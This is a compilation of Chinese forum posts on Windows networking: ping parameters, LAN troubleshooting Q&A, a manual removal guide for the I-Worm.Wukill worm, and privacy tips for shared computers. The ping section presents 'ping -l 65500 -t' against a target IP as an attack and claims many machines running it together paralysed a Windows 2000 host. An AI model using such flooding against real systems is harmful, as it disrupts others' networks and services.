从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。
-f Set Don`t Fragment flag in packet.
在数据包中发送“不要分段”标志。
在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。
-i TTL Time To Live.
指定TTL值在对方的系统里停留的时间。
此参数同样是帮助你检查网络运转情况的。
-v TOS Type Of Service.
将“服务类型”字段设置为 tos 指定的值。
-r count Record route for count hops.
在“记录路由”字段中记录传出和返回数据包的路由。
在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:
C:\>ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
好了,ping命令也基本上完全讲解完了,其中还有-j,-k参数我还没有详细说明,由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍,请大家见谅,如果在看了这篇文章的朋友当中有知道得比我更多的,以及其他使用技巧的也希望您能告诉我,并在此先谢过。
局域网应用问题专题解答 (Rayi々)
1、问:我访问局域网中的计算机时,为什么常常被提示要输入用户名和密码?
答:这主要是为了安全方面的考虑。而且当你重新启动计算机时又要重新输入用户名和密码,这一点确实让人会觉得很麻烦。
你只要在需要进行文件共享的计算机上建立一个相同的用户名,并且使用相同的密码,然后局域网中的计算机都利用这个用户名和密码登录,这样在网上邻居中访问对方计算机时就不需要输入用户名和密码了。
2、问:上网浏览前在局域网中应如何对IE进行设置?
答:在局域网中使用代理服务器上网浏览时,应对浏览器进行必要的设置。以IE为例,在浏览器中代理服务器的设置方法为:用鼠标右击桌面上的IE图标,在弹出的右键菜单中选择“属性”命令。在打开的“Internet 属性”对话框中选择“连接”项,然后点击“局域网设置”,在“局域网(LAN)设置”对话框中选中“使用代理服务器”,并输入代理服务器的地址以及端口。
默认对于HTTP、FTP浏览器都是使用相同的代理服务器设置,如果对这些服务有不同的代理,你就需要进行其他的设置。
方法为:点击“高级”按钮,取消“对所有协议均使用相同的代理服务器”,并分别在不同的服务中输入各自的地址和端口,保存以上设置后,IE就可以使用代理服务器上网了。
3、问:在局域网中应如何设置OutLook Express收发邮件?
答:在局域网中OE等电子邮件收发软件同样可以通过代理服务器上网,只是不能再使用原来的单机拨号上网设置。而且相对于其他软件的代理服务器设置,邮件软件的服务器设置要更为特殊一点,其代理服务器的类型必须是Socks4或Socks5的服务器。假设所使用的代理服务器的地址为:202.102.49.141,用户的邮件地址为:[email protected]。
那么在OE中代理服务器的设置方法为:打开OE后,选择菜单“工具→账户”。在“Internet账户”中选择“邮件”选项卡,然后在账户列表中选择需要设置的账户,点击“属性”按钮。在属性窗口中选择“服务器”选项卡(图1),在接收和发送邮件服务器地址中输入代理服务器的地址(如202.102.49.141),并按“用户名#邮件真实的收信地址”的命名规则,在账户名中输入 “jjxm#POP3.163.com”,单击“确定”保存后即可在代理服务器中收发邮件了。
4、问:在由三台电脑组成的局域网中,我在其中一台电脑上用过Windows优化大师后,为什么这台电脑就不能登录网络,并且还提示找不到拨号适配器?
答:根据你说的情况,是没有安装“拨号网络”。解决方法是:在“控制面板”的“添加/删除程序”中,选择“Windows安装程序”,在“组件”的“通讯”中选择“拨号网络”,然后将Windows安装盘放入光驱进行安装,重新启动计算机后就可使用拨号网络了。
5、问:如何在局域网中设置QQ、ICQ等即时通讯软件?
答:在QQ的主窗口中点击“QQ2000”的按钮,在其主菜单中选择“系统参数”,在参数窗口中选择“网络设置”选项卡。首先在“上网类型”中选择“局域网接入Internet”,再选中“使用Socks5代理服务器”,然后输入服务器的地址以及端口(图2),如果代理服务器中设定了用户密码,还需要输入用户名和密码。输入完毕后可以点击“测试”按钮来检测其代理是否正常。最后单击“确定”即可在代理服务器中使用QQ了。
类似地,在ICQ中选择“连接”中的“防火墙”,可以定义多个代理服务器,如Socks4、Socks5、HTTPS等。你首先要确定并选择所使用的代理服务器类型,然后在“代理服务器”部分输入主机的地址、端口,如果代理服务器设置了用户密码,还必须输入用户名和密码。对于代理服务器的类型、地址、端口等,如果你不太清楚,可以询问网络管理员。
6、问:我想用NetMeeting进行局域网中的通话,应该如何设置?
答:如果你首次打开NetMeeting,软件会自动启动配置向导。在配置向导窗口点击“下一步”,然后输入你的基本信息(如姓名、E-mail等)。继续单击“下一步”,进入服务器配置窗口,NetMeeting允许启动时登录到目标服务器,这个功能是针对于普通上网用户的,局域网用户并不需要该功能,因此你必须取消该选项。继续单击“下一步”,选择网络速度,必须选择“局域网”,然后提示是否建立快捷方式,你可以根据需要进行选择。接下来进行音频调节测试后就完成了局域网中对NetMeeting的设置。
7、问:我知道在局域网内文件是可以共享的,但我想问的是,打印机和扫描仪应该如何共享?
答:先来说说打印机的共享方法。你可以先在局域网内找一台电脑,并把打印机连接到这台电脑上,然后按照说明书为打印机安装好驱动程序。在Windows系统任务栏上,点击“开始→设置→控制面板”,在“控制面板”窗口中双击“打印机”图标,再用鼠标右键单击打印机图标,在弹出的右键菜单上选择“共享”,然后在打开的“打印机属性”窗口上选择“共享为”,并像共享文件那样给被共享的打印机也起一个共享名,然后点击“确定”即可。
关于扫描仪的共享设置,你首先要看一下你的扫描仪是否具有网络共享功能,是否配备了用于共享的驱动程序,也就是说只有部分扫描仪可以进行网络共享。另外不同型号扫描仪的共享设置差异很大,最好查阅一下扫描仪的说明书。
8、我用分机线上网,上网速度最大才48000bps,请问是何原因? 还有,将Modem放在主机箱侧面,开机后(未打开Modem电源),家里的电话就处于忙音状态,如何解决?
答:第一个问题跟你的分机电话线或线接头质量有很大关系,另外,如果你的Modem的速度平常都能接近48000bps,你也不要太在意,应该重点先看下它的实际下载速度是否令你满意。第二个问题,肯定和你主机的电源等配件的电磁辐射强和屏蔽效果差有关,你如果不想对你的主机进行大换血的话,最好用物体在主机和Modem之间进行屏蔽,或将Modem离你的主机远点,这是最好的办法。
9、我新购的网卡在电脑上无法安装,而在其他电脑上却使用正常,这是怎么回事?
答:如果在电脑中安装好网卡后,系统没有提示找到新硬件,你可运行“添加新硬件向导”来让系统搜索新硬件。方法是单击“开始”,指向“设置”,单击“控制面板”,然后再双击“添加新硬件”。按照屏幕提示操作。你可选“让Windows搜索新硬件吗?”,单击“是(推荐)”,然后再单击“下一步”,让系统找到网卡再安装其驱动。
而如果出现以下任何现象,网卡或者网卡所在的插槽损坏:
1、“添加新硬件向导”检测不到网卡;
2、“添加新硬件向导”能够检测到网卡,但无法正常工作。
为了确定到底是网卡还是插槽的问题,可以检查网卡是否牢靠插入插槽之中。如果网卡已牢靠插入插槽之中,请改插到其他插槽之中试试。如果问题仍未解决,则可能是网卡损坏或与你的电脑不兼容,可更换之。
10、我的电脑出现“网上邻居”中找不到其他联网电脑的故障,如何解决?
答:“网上邻居”是按工作组显示计算机的。如果你的电脑没有设置工作组名称,打开“网上邻居”时就可能看不到其他电脑。单击“开始”,指向“设置”,单击“控制面板”,双击“网络”,然后再单击“标识”选项卡。你局域网中所有电脑“工作组”框中的名称应为一样,如有不同你可在此框中键入相同的工作组名称,然后单击“确定”重启电脑既可。
此外,如果“网上邻居”中不出现“整个网络”图标,可能是在Windows中没有安装必要的网络组件。要与网络上的其他计算机连接,则必须安装以下组件:Microsoft网络客户、网络适配器、至少一种网络协议(如IPX/SPX、TCP/IP等)。可打开“网络”,检查“配置”选项卡上的列表,确保已安装了各种必要的网络组件。如有,你可重新安装各种缺少的组件即可。
11、问:公司局域网,只有一台机器通过猫接入互联网,现想其他机器接入互联网,请问如何实现?
答:这是一个比较典型的代理上网问题。你可以在带猫的机器上安装代理上网软件(如Sygate、Wingate、Winproxy)或直接使用Windows自带的共享上网功能上网(Windows 98第二版以上才带此功能)。建议使用Sygate,该软件设置较简单。先拨号上网,后安装Sygate,完毕后,Sygate将检测互联网的连接状态,并自动设置。在其他需要代理上网的机器上,指定网关和DNS的 IP地址,步骤为网上邻居→右键→属性→TCP/IP协议→属性→DNS,输入当地ISP的IP地址→网关,输入代理服务器的IP地址→确定→重启。设置完毕后,其他各项应用软件均无须设置。
12、问:局域网通过路由器、使用ADSL方式上网,如何使各工作站快速的获得可以上网的IP地址而不手工去指定?
答:假如使用Windows 2000,可以直接使用Windows 2000自带的dhcp功能,首先建立一个作用域,然后为这个作用域添加DNS的搜索顺序和路由器的IP地址,DNS搜索顺序为当地ISP的IP地址,路由器的IP地址即设置成当前局域网的路由器IP地址,其他机器则不指定IP地址,如非使用Windows 2000,则可使用第三方的dhcp软件,比如代理软件sygate和wingate都带有dhcp功能。
13、问:公司要组建局域网,需要用到邮件服务器和WWW服务器,请问这两种服务放到一台电脑里还是分别用两台电脑?都用什么软件?谢谢!
答:这两种服务现在用的皆比较广泛,可以只用一台计算机或用两台都可以,当然具体根据贵单位的预算开支和流量来决定。假如流量不大的话,建议只使用一台机器即可。至于软件方面,可以使用Windows 2000作服务器平台,然后使用Imail或Easymail作为邮件服务软件,www服务建议使用apache serve软件,因为Windows 2000自带的IIS存在许多漏洞,而且不安装,在建立www服务器后,需考虑支持的语言脚本,现在用的比较广的是ASP和php,当然,具体使用哪种语言,很简单,看你自己精通哪方面就使用哪方面的,还有一点你没提供到的,就是很有必要建立一个ftp服务,你可使用u-ftp软件,这款软件在安装和使用方面都不难。
14、问:家里原先有一台PII的计算机,最近又新增一台P4机器,操作系统都为Windows 98且已安装网卡,现在我想把他们联起来共享资源,该怎么办?
答:你所提的实际上即现在应用的比较广泛的对等网的连接。很简单,因你已有网卡,你需做的使是购买适合长度的超五类线和2个RJ45的水晶头,再去借一把打线钳。然后再根据标准做一对跳线,即一头采用T568A标准(具体线的排列是:白绿、绿、白橙、蓝、白蓝、橙、白棕、棕),另一头采用T568B标准(白橙、橙、白绿、蓝、白蓝、绿、白棕、棕)。然后在操作系统中添加TCP/IP协议和Netbuei协议,把工作组设置为workgroup,计算机不能相同。
15、问:办公室机器桌面的“网上邻居”图标没了,能上Internet,但无法浏览其他机器上的资源了,怎么办?
答:说明你的Internet属性完好,但网上邻居属性中的“Microsoft 网络用户”这一客户组件没了。
进到“控制面板”中双击“网络”,先在弹出的网络对话框中点按“添加”按钮,再从随后弹出的“请选择网络组件类型”对话框中双击“客户”,最后从随后的“选择网络客户机”对话框的左侧选择“Microsoft”后再选择“Microsoft 网络用户”,“确定”再“确定”并据提示重启计算机就ok啦!先回去解决这个问题吧你……
16、问:办公室机器桌面的网上邻居图标解决了且也能浏览其他机器的共享资源了,但发现右键中的“共享”命令没了!怎么办?
答:这是因为还缺少个“Microsoft网络上的文件与打印机共享”这一网络服务协议呢!
先右击桌面“网上邻居”选“属性”,对话框中点按“添加”按钮,再从随后弹出的“请选择要安装的网络组件”对话框中双击“服务”,最后从随后的“选择网络服务”对话框中选择“Microsoft网络上的文件与打印机共享”,“确定”再“确定”并据提示重启计算机就ok啦!
17、问:右键中的“共享”命令已经显身!但我设了共享不想让别人从网上邻居中看到这个共享目录,只有自己知道且能实现异地机上有完全操作的权限。
答:找到你想要共享的文件夹并右键点选“共享…”----这里我就以共享“D:\Windows 98”为例,先选中“共享为”后在共享名“Windows 98(当然也可改名共享哦)”后加一英文状态的“$”符,再选中“完全”并输入设定好“密码”,然后“确定”一次密码就OK了。
这样一来,绝对保证别人从网上邻居中看不到这个共享目录的!那~~自己想从异地机上进入并实现完全操作时怎么办呢?呵呵,这么办:从异地机的地址栏中键入“\\(机器名)\$(你的共享目录名)”并“ENTER”,再输入密码并确定后,就进入啦!这样你可静悄悄地实现异地机上在自己设定的共享目录内进行完全操作啦!不过注意其中“\”不能误输入成“/”哦!……好了,你会了吗?
18、问:一块PCI总线的10/100自适应网卡,无法正常工作。主要表现在网络时断时续,不管是不是Ping自己的IP地址,还是Ping对方的IP地址,都有这种情况发生。查看网卡的指示灯也出现同样的现象。
答:首先你可检查Hub的连接口是不是出了故障,将该网卡接到其他端口上,如果问题依然如故,说明Hub没有问题。然后你可用网卡随盘附带的测试程序盘查看网卡的有关参数,其IRQ值为5,再回到Windows 95/98操作系统,查看操作系统分配给网卡的参数值,其IRQ同样应是5。此外,可检查安装该网卡的主板插槽是否有故障,你可打开机箱,将网卡换个PCI插槽试试。此外,你还可检查CMOS参数设置,重新启动计算机,进入CMOS状态,选择“PNP/PCI Configuration”一项,如果IRQ5后面的状态为“Legacy ISA”(保留的ISA总线设备),就应当将IRQ5后面的状态改为“PCI/ISA PNP”。
19、问:我的电脑与一个对等网连接好了,但不能读别人电脑上的数据,这是怎么回事?
答:可能是你没有设置好资源共享:选择“网络→配置→文件及打印共享”,将两个选项全部打勾并确定,安装成功的标志是配置中出现了“Microsoft网络上的文件与打印机共享”选项,注意,还要检查它与NetBEUI协议是否进行了绑定。选择“配置”中的NetBEUI协议,点击“属性”按钮,看绑定中“Microsoft网络上的文件与打印机共享”、“Microsoft网络用户”前是否已经有对勾了。还要在“网络→标识”里将“计算机名”设置好,确定之后系统将重新启动。
20、问:我的网络从集线器升级为交换机后,感觉速度并没有多大提高,是什么原因?
答:这种情况需要从以下几个方面来分析:
1、首先应确认网络是否工作在100M状态,具体做法是:确认网线是五类以上线,网线做法遵循100M标准,网卡支持100M工作状态,只有满足以上条件,交换机才能工作于100M状态,从而最大限度地体现交换机的性能优势。
2、如果网络在升级前工作正常,数据交换量不是很大,数据冲突和广播风暴现象出现的不是很频繁,那么升级后网络性能的提升可能不是很明显,这是正常现象。
3、还有一种情况是因为网络结构设置不当引起的,例如,如果把集线器放在第一级连接服务器,而把交换机放在下一级来连接工作站,这样数据交换仍然通过集线器进行,交换机的性能优势没有体现出来。所以,在组网时应当充分考虑网络结构的合理性,应将性能较好的设备置于整个网络的最高级。
21、问:VLAN是什么意思,使用它有什么好处?
答:VLAN是Virtual Local Area Network的缩写,即虚拟局域网的意思。VLAN的划分有三种方式:基于端口(Port)、基于MAC地址和基于IP地址。通过划分VLAN,可以把数据交换限制在各个虚拟网的范围内,从而减少整个网络范围内广播包的传输,提高了网络的传输效率;同时各虚拟网之间不能直接进行通讯,而必须通过路由器转发,起到了隔离端口的作用,为高级安全控制提供了可能,增强了网络的安全性。VLAN功能的适用性很广,在数据交换较频繁或对网络安全性有要求的环境均可适用,如:1、在智能小区、校园、企业等应用环境,使用VLAN功能可使不同VLAN间的机器不能互相访问,可为网络安全控制提供良好保障;2、在游戏厅、大中型企业等环境,使用VLAN可大大减少网络中不必要的数据交换的数量,杜绝广播风暴,提升网络传输性能。
22、问:我的自适应网卡只有红灯闪烁,绿灯不亮,这种情况正常吗?
答:首先你应该了解一般自适应网卡红灯和绿灯分别代表什么含义——红灯代表Link/Act(连通/工作),即连通时红灯长亮,传输数据时闪烁;绿灯代表FDX(全双工),即全双工状态时亮,半双工状态时灭。如果一个半双工的网络设备(如Hub)和自适应网卡相连,由于这张网卡是自适应网卡,它也会工作在半双工状态,所以绿灯不亮也属于正常情况。
23、问:如何使用交换机的UpLink端口,怎样连接?使用了UpLink口后,是否还可以使用其相邻最近的端口?
答:UpLink口是交换机上常见的一种端口,它是为了便于两台交换机之间进行级联的端口。它与其相邻的普通UTP口使用的是同一通道,因而,如果使用了UpLink口,另一个与之相邻的普通端口就不能再使用了。这两个端口称为共享端口,不能同时使用。级联的时候,你可使用一般的网线(网线的两端都遵循同一标准,即同是EIA/TIA 568A或568B)将一个交换机的普通端口和另一个交换机的UpLink口连起来。如两个设备都使用UpLink口连接,网线需要一端使用EIA/TIA 568A的标准,另一端使用EIA/TIA 568B的标准(如下表)。
标准568a 标准568b
橙白1 绿白1
橙2 绿2
绿白 3 橙白3
蓝4 蓝4
蓝白5 蓝白5
绿6 橙6
棕白7 棕白7
棕8 棕8
24、问:我在安装网卡后,在“系统→设备管理器”中网卡出现黄色的“!”号,请问该如何解决?
答:网卡较容易与其他设备发生资源冲突,尤其是在系统中安装有多个插卡的情况下,解决办法是:
1、更换网卡在主板插槽上的位置是最好的解决办法。
2、在该网卡“属性”窗口“资源”标签中找到“资源类型”列表,选定发生冲突的“资源”,按“更改设置”按钮,更改发生冲突的IRQ中断号或者I/O地址。
3、有些PCI网卡会强行占用IRQ10,与一些强行占用IRQ10的显示卡发生IRQ中断冲突,如果遇到这种情况,可在BIOS中将“Assign IRQ For VGA”项设置为Disabled,不给显示卡分配固定的中断。
4、运行网卡附带的软盘中的设置程序,将网卡设置为非PNP模式,设置IRQ中断号和I/O地址为系统未占用的地址;并在BIOS中将相应中断号由PCI/ISA改为Legacy ISA。
如果使用上述方法均不能解决故障,建议换一块网卡试试。
25.问:ADSL上网网页打不开的问题?
答:是MTU的问题!改一下注册表!
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\0000\主键下面建立字符串键名为MaxMTU,键值为1450
查杀I-Worm.Wukill病毒(注意有变种了)的手工方法 (微笑)
我是用手工杀的。金山毒霸好象还不行,跟本就不报警。
首先用进程管理工具(如“优化大师”带的进程管理工具)把可疑的进程杀掉,再搜索最大不超过87KB的“*.EXE”文件,瑞星上说的自启动“MSTRAY.EXE”文件不对,它好象有了新的变种,自启动的文件名可以变换,而且有时每次重启动都会变,也不一定在WINDOWS哪个目录下,所以要查整个不超过87KB大小的.EXE文件,然后将所有图标为文件夹样式的.EXE文件删掉。同时对照注册表里的RUN项,查找不正常的启动项(建议也用优化大师,这样好判别,毒霸的也可以),除删掉启动项外,还要再查找一次不正常启动项对应的程序,并删掉。注意:这步操作十分危险,建议由有经验的人员操作。
接着再分别查找comment.htt 和desktop.ini,把它们都删掉。注意不要把“*:\My Documents”下的这两个文件删了,一般这里的都是正常文件(我自己用的笨办法就是用记事本打开,看看里面是不是MICROSOFT的东东)。
最后重启就OK了。
瑞星的在2月份就可以杀了,毒霸好象到现在都不行,是它的破坏力太小所以毒霸不屑一顾?????!!!!!!!!
刚又看了看前人的贴,发现这个家伙变种变的还是蛮快的。其中最大的变化就是自启动项的变化,这个病毒我遇到的最厉害的是在内存中同时有不同文件名的3个进程,并且自启动项的名称也不断变化,但WINFILE.EXE这个文件始终存在,而且一般是在根目录下,并陪随comment.htt 和desktop.ini这两个文件,可能这可以算为标志性文件之一了。在其它的目录下,则会根据你实际存在的目录名而更换自己的名称(呵,呵,这一点我比较佩服),不过无论它怎么换名,文件大小大都是约在85KB左右(具体字节我没有记录)。
建议怀疑自己中毒时,把“隐藏已知文件类型的扩展名”这个选项去掉,如果有文件夹图标的.EXE文件,那么恭喜你---------------中毒了!!!!!
另:正常的WINFILE.EXE文件大小为151419字节,且图标为一个文件柜样式。
在网上看到了一篇贴子。I-Worm.Wukill
破坏方法:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。
一、 病毒首次运行时将显示"This File Has Been Damage!";
二、 将自己复制到windows目录下并改名为Mstray.exe;
三、 修改注册表:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以达到其自启动的目的;
四、 枚举磁盘目录,在每个根目录下释放下列文件:
winfile.exe 病毒主体程序
coment.htt 利用IE漏洞调用同一个目录下的"winfile.exe",属性为隐藏。
desktop.ini 系统为隐藏。采用web方式浏览文件夹时,系统会调用该文件,该文件调用coment.htt ,从而激活病毒。
五、 病毒修改注册表,隐藏系统文件、隐藏受系统保护的文件、隐藏已知的扩展名称。
这样,用户看不到coment.htt和desktop.ini, winfile.exe被隐藏后缀明,又是文件夹图标,用户极容易认为是文件夹而点击。
同时病毒在当前路径下生成的自身拷贝,名称采用上级目录,或者是当前窗口的标题,增加隐蔽性。
六、病毒调用Outlook发送携带病毒的信件。
你先试试:
1 [在运行里输入REGEDIT (进入注册表编辑器) 在编辑工具里点吉查找 输winfile 确定,即输出winfile.ini 删除它 然后回盘里就可以删除了 !]
2 用KV2004升级版在网上进行了最新的升级后,运行KV2004就可以了
利用Ping命令判定网络故障 (sindasun)
Ping 是Windows系列自带的一个可执行命令。利用它可以检查网络是否能够连通,用好它可以很好地帮助我们分析判定网络故障。应用格式:Ping IP地址。该命令还可以加许多参数使用,具体是键入Ping按回车即可看到详细说明。
#11.Ping本机IP
例如本机IP地址为:172.168.200.2。则执行命令Ping 172.168.200.2。如果网卡安装配置没有问题,则应有类似下列显示:
Replay from 172.168.200.2bytes=32 time<10ms
Ping statistics for 172.168.200.2
PacketsSent=4 Received=4Lost=00% loss
Approximate round trip times in milli-seconds
Minimum=0msMaxiumu=1msAverage=0ms
如果在MS-DOS方式下执行此命令显示内容为:Request timed out,则表明网卡安装或配置有问题。将网线断开再次执行此命令,如果显示正常,则说明本机使用的IP地址可能与另一台正在使用的机器IP地址重复了。如果仍然不正常,则表明本机网卡安装或配置有问题,需继续检查相关网络配置。
#12.Ping网关IP
假定网关IP为:172.168.6.1,则执行命令Ping 172.168.6.1。在MS-DOS方式下执行此命令,如果显示类似以下信息:
Reply from 172.168.6.1 bytes=32 time=9ms TTL=255
Ping statistics for 172.168.6.1
PacketsSent=4Received=4Lost=00% loss
Approximate round trip times in milli-seconds
Minimum=1msMaximum=9msAverage=5ms
则表明局域网中的网关路由器正在正常运行。反之,则说明网关有问题。
#13.Ping远程IP
这一命令可以检测本机能否正常访问Internet。比如本地电信运营商的IP地址为:202.102.48.141。在MS-DOS方式下执行命令:Ping 202.102.48.141,如果屏幕显示:
Reply from 202.102.48.141 bytes=32 time=33ms TTL=252
Reply from 202.102.48.141 bytes=32 time=21ms TTL=252
Reply from 202.102.48.141 bytes=32 time=5ms TTL=252
Reply from 202.102.48.141 bytes=32 time=6ms TTL=252
Ping statistics for 202.102.48.141
PacketsSent=4Received=4Lost=00% loss
Approximate round trip times in milli-seconds
Minimum=5msMaximum=33msAverage=16ms
则表明运行正常,能够正常接入互联网。反之,则表明主机文件(windows/host)存在问题。
东西抢注:注意一下:冲击波之后的DNS服务器都是禁止PING的也就是关闭了ICMP协议的
这样大家可以使用TRACERT这个命令跟踪数据包,也是可以同样达到目的
当心电脑暴露你的隐私 (sindasun)
如果使用的是办公室、网吧等地的公共用机,你的很多秘密就可能暴露在别人眼前。
#1一、操作系统
如果想把属于隐私的图片、视频片断或者重要文档文件等保存在公共电脑中,很多人采取的办法把文件或文件夹的属性改为“隐藏”,然后再把它们藏匿在电脑中某个不起眼的文件夹里。可在Win 98的“开始”→“文档”菜单中,会记录最近打开过的15个文件名,因此别人可以点击相应的文件名来打开文件,就算你已经把文件藏起来了,别人也可以从这里窥视你的秘密。
解决办法:要清除这些痕迹,你可以用鼠标右键点击任务栏的“属性”,后点“开始菜单程序”,再点“清除”就可以删除“文档”菜单中的内容和其他个人历史记录列表了。这样做可以在一定程度上保护你的秘密,但别人还可以通过“开始”菜单中的“查找”功能来搜索你的重要文件,按文件的类别把硬盘上所有的图形文件、*.txt、*.doc文件等找出来,然后一个一个地查看,秘密依然存在被泄露的可能。
报纸上曾介绍过一种修改注册表隐藏硬盘的办法,即把要隐藏的文件专门放到某个硬盘(如F盘)上,然后修改注册表把这个盘藏起来(在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下新建一个Dword值“NoDrives”,再设置键值,例如把键值设为20就可以隐藏F盘),在资源管理器中就看不到这个盘了。这种办法表面上无懈可击,被隐藏的盘对于大多数软件都不可见,你通过“查找”功能也无法找到该盘上的文件,一些所谓的电脑高手也把这种办法当做可靠的保密手段。然而这种方法有重大的漏洞,在DOS状态下这个盘完全可见,而在Windows下,我找到一种非常简单的办法破除这种限制。只要在“我的电脑”或者IE浏览器的地址栏中键入盘符“F:”,然后打回车键,这个盘的内容就一览无余,所有的秘密荡然无存。
解决办法:如果对保密的要求比较高,可以用一些软件来加密或者隐藏,可以基本解决保密问题。但是,就算是用加密/隐藏软件,也不是十分安全的。一方面有些隐藏软件有漏洞,对于熟悉计算机的用户来说,并不难破解限制;另一方面一些加密/隐藏软件的加密程度不高,可找到相应的软件来破解密码。所以对于保密要求非常高的用户来说,如果是比较小的文件,最好不要保存在硬盘上,可以保存在软盘上,如果文件太大,不能保存在软盘上,可以用PGP之类的超强加密软件来加密。
#1二、常用程序
Windows下的很多应用程序,如Word、Excel、媒体播放器Media Player、RealPlayer等,会在该程序“文件”菜单下列出最近打开过的一些文件名。尽管你已经把文件藏匿在电脑中的某个地方了,但别人还是可以通过这些文件名清单轻易打开相应的文件。
解决办法:对于Word 2000、Excel 2000等,可以在Word/Excel的“工具”→“选项”的“常规”选项卡中把“列出最近所用文件”的个数改为0;在媒体播放器和Realplayer中清除这些历史记录,只能到注册表中删除,要清除Realplayer中的历史记录,则到HKEY_LOCAL_MACHINE\Software\CLASSES\Software\RealNetworks\Realplayer\6.0\Preferences\MostRecentClips1删除相关键值(Realplayer默认情况下是在“文件”菜单中显示最近播放过的8个剪辑,Mostrecentclip1只是第一个,要删除其他几个你还须要分别删除)。要清除媒体播放器上的记录只有到注册表中,删除HKEY_HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList下的键值。通过注册表来清除历史记录比较麻烦,而且对新手来说具有一定危险性。
变通的解决办法是:在看完这些视频片断之后,把文件的扩展名改为Realplayer或者媒体播放器等不支持的虚假扩展名。例如你刚才看的视频文件名字叫做123.mpeg,你可以把它的文件名改为sdk.dhl,然后把它重新藏到其他不起眼的文件夹中,最好远离原来的文件夹。虽然原先的记录还保存在“文件”菜单中,但是Realplayer、媒体播放器已经找不到该文件了。下次你要再次观看时,可以重新把文件的扩展名修改回来。修改文件扩展名对于隐藏其他类型的文件也是一个简单有效的办法,虽然这种办法并不很保险,但对于很多人而言,这种办法已经能基本满足要求了。相比之下Yahoo!Player在这方面就做得好得多,你可以到Yahoo!Player的“Edit→Prefenrence→General”中勾选“On exit,clear history(退出时清除历史记录)”,这样以后你每次关闭Yahoo!Player就会自动清除历史记录。
#1三、IE浏览器
如果你是上网用户,更要小心你的秘密被泄露了。IE浏览器会记录你访问过的站点的地址,别人可以通过历史记录来查看。
解决办法:如果你不想让别人知道你的行踪,可以通过点击浏览器“工具→Internet选项→常规”选项卡中“清除历史记录”。
对于那些通过登录Web收发电子邮件的用户来说,你所看过的信别人可以轻易看到,这是一个极其严重却被广泛忽视的安全问题。那些在网吧上网的人士要特别小心了,说不定你前脚刚走,那些别具用心的人就来偷看你的秘密了。通过点击浏览器的“历史”按钮,可以看到最近一段时间所访问页的记录。在先选择“脱机工作”的情况下,再点击有关E-mail的页面,别人就可以看到你曾看过的信!
解决办法:要消除这个漏洞,仅靠清除历史记录是不够的,别人即使通过历史记录看不到你的访问记录了,但是可以到C:\Windows\Temporary Internet Files文件夹中去查看全部内容。关键就是把这个文件夹中的内容清除,你可以点击浏览器“工具”→“Internet选项”之“常规”选项卡中的“删除文件”来删除所有的脱机内容。
